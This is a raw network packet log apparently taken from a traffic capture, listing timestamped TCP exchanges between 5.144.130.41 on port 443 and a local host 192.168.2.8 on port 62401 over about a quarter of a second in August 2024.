                                      Aug 20, 2024 18:40:08.779304981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.779335022 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.779373884 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.779382944 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.779402018 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.779743910 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.783185959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.783216953 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.783248901 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.783251047 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.783291101 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.783464909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.786520958 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.786544085 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.786556005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.786564112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.786576033 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.786600113 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.790505886 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.790532112 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.790586948 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.790605068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.790620089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.790641069 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.794908047 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.794943094 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.794974089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.794987917 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795296907 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795332909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795346022 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.795356989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795378923 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795386076 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.795396090 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.795418978 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825630903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.825678110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.825782061 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825809002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.825881004 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.825889111 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827171087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827193975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827214956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827234983 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827241898 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827258110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.827269077 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827269077 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.827291012 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.832307100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832372904 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832417965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832428932 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.832454920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.832494020 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836766005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836817980 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836829901 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836863995 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836889029 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.836929083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.836961031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838669062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838721037 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.838737965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838814020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838833094 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.838851929 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.838866949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.839925051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.844320059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844361067 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844434023 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.844459057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844485998 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844517946 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.844527006 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.845076084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845144033 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845160007 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845165014 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.845175982 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.845212936 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847673893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847712040 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847786903 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847795010 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847819090 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.847858906 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.847866058 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850809097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850825071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850841999 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.850871086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.850907087 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.853784084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853796959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853847980 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.853871107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.853907108 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.854307890 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.854429960 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.854465961 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.854475975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.857969046 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.857995987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.858026981 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.858052015 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.858290911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862466097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862479925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862528086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.862555027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.862597942 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.863915920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864780903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864810944 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864857912 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.864870071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.864897966 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866312027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866331100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866365910 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866385937 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866400957 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866426945 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866837025 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866858959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.866898060 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.866909027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871490002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871507883 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871519089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871562004 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.871587038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.871598005 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.874907017 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.874944925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.874984980 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875004053 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875014067 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875072956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875083923 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875113964 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875119925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875159979 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875425100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875447989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875494003 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875500917 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.875535965 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.875590086 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.876260042 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.876313925 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.876319885 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879017115 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879085064 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879096031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879132986 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879160881 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879188061 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879234076 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.879239082 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.879273891 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883544922 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883737087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883752108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883790970 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883801937 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883837938 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883896112 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883913040 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.883958101 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.883964062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913383007 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913403034 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913547993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913584948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913604021 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913707972 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913718939 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.913815975 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.913824081 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916846037 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916866064 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.916981936 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.917011023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.917076111 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921195984 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921267033 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921293974 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921324968 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921341896 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921365976 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921374083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.921381950 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.921401978 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927298069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927324057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927336931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.927383900 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927424908 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.927953005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933136940 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933159113 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933186054 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933224916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933267117 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933283091 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933773041 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933793068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933819056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.933826923 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.933856010 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.934612989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.934690952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.935477972 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936625957 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936645031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936655998 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936691999 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.936721087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.936733007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942260981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942344904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942378044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942395926 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942415953 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942445993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.942452908 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.942471027 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.947870016 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.947902918 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.947952986 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.947976112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.948362112 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.948415995 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.948427916 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952768087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952791929 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952826977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.952838898 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.952857971 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.952877045 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.953080893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958323956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958337069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958405972 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958426952 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958470106 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958473921 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958508968 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.958539963 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.958548069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961905003 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961919069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.961992025 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962011099 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962050915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962058067 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962075949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962088108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962124109 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962131023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962162971 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962390900 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962570906 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962589979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962609053 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962615967 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962627888 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.962641001 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.962668896 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.963388920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963404894 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963422060 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.963469982 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.963485956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966252089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966267109 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966296911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966326952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.966346979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966386080 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.966393948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.966440916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970568895 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970735073 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970822096 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970844030 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970911980 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970947027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970966101 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.970973969 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.970988989 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.999842882 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.999865055 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.999977112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.000006914 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.001307011 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.001326084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.001338959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.001369953 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.001389027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.001405001 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.006478071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.006521940 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.006555080 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.006582022 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.006609917 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.006620884 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.006633043 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.006649017 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018485069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018506050 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018524885 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018537045 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018594027 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018627882 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018641949 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018646955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018665075 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018672943 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018712997 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018901110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018944979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018946886 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.018964052 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.018996954 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.019005060 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.019915104 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.019937992 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.019967079 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.019977093 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.019996881 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.020016909 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.020016909 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.021807909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021858931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021872044 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.021894932 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021914005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021934032 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.021936893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021948099 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.021965027 CEST443624015.144.130.41192.168.2.8
